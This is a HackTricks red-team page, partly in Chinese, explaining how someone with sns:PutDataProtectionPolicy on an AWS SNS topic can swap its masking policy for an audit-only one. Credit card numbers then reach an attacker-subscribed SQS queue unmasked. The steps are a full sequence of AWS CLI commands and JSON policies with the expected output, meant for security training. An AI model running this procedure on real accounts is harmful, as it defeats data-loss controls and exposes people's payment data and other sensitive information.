AWS - SNS Message Data Protection Bypass via Policy Downgrade

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

如果你对某个 topic 拥有 sns:PutDataProtectionPolicy,你可以将其 Message Data Protection 策略从 Deidentify/Deny 切换为 Audit-only(或移除 Outbound 控制),使敏感值(例如信用卡号)以未修改的形式发送到你的订阅。

Requirements

  • 目标 topic 上调用 sns:PutDataProtectionPolicy 的权限(通常还需 sns:Subscribe,如果你想接收数据)。
  • 标准 SNS topic(支持 Message Data Protection)。

Attack Steps

  • Variables
REGION=us-east-1
  1. Create a standard topic and an attacker SQS queue, and allow only this topic to send to the queue
TOPIC_ARN=$(aws sns create-topic --name ht-dlp-bypass-$(date +%s) --region $REGION --query TopicArn --output text)
Q_URL=$(aws sqs create-queue --queue-name ht-dlp-exfil-$(date +%s) --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes Policy=Version:2012-10-17
  1. Attach a data protection policy that masks credit card numbers on outbound messages
cat > /tmp/ht-dlp-policy.json <<'JSON'
{
"Name": "__ht_dlp_policy",
"Version": "2021-06-01",
"Statement": [{
"Sid": "MaskCCOutbound",
"Principal": ["*"],
"DataDirection": "Outbound",
"DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
"Operation": { "Deidentify": { "MaskConfig": { "MaskWithCharacter": "#" } } }
}]
}
JSON
aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-policy.json)"
  1. Subscribe attacker queue and publish a message with a test CC number, verify masking
SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)
aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message payment:{cc:4539894458086459}
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All

Expected excerpt shows masking (hashes):

"Message" : "payment:{cc:################}"
  1. 将策略降级为仅审核 (no deidentify/deny statements affecting Outbound)

对于 SNS,Audit 语句必须是 Inbound。将策略替换为仅审核的 Inbound 语句会移除任何对 Outbound 的去标识化,因此消息会以未修改的形式流向订阅者。

cat > /tmp/ht-dlp-audit-only.json <<'JSON'
{
"Name": "__ht_dlp_policy",
"Version": "2021-06-01",
"Statement": [{
"Sid": "AuditInbound",
"Principal": ["*"],
"DataDirection": "Inbound",
"DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
"Operation": { "Audit": { "SampleRate": 99, "NoFindingsDestination": {} } }
}]
}
JSON
aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-audit-only.json)"
  1. 发布相同的消息并验证未掩码的值已被传递
aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message payment:{cc:4539894458086459}
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All

预期输出片段显示明文信用卡号:

4539894458086459

影响

  • 将一个 topic 从 de-identification/deny 切换为 audit-only(或以其他方式移除 Outbound 控制)会允许 PII/secrets 原样通过到攻击者控制的 subscriptions,从而实现本应被掩盖或阻止的数据外泄。

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks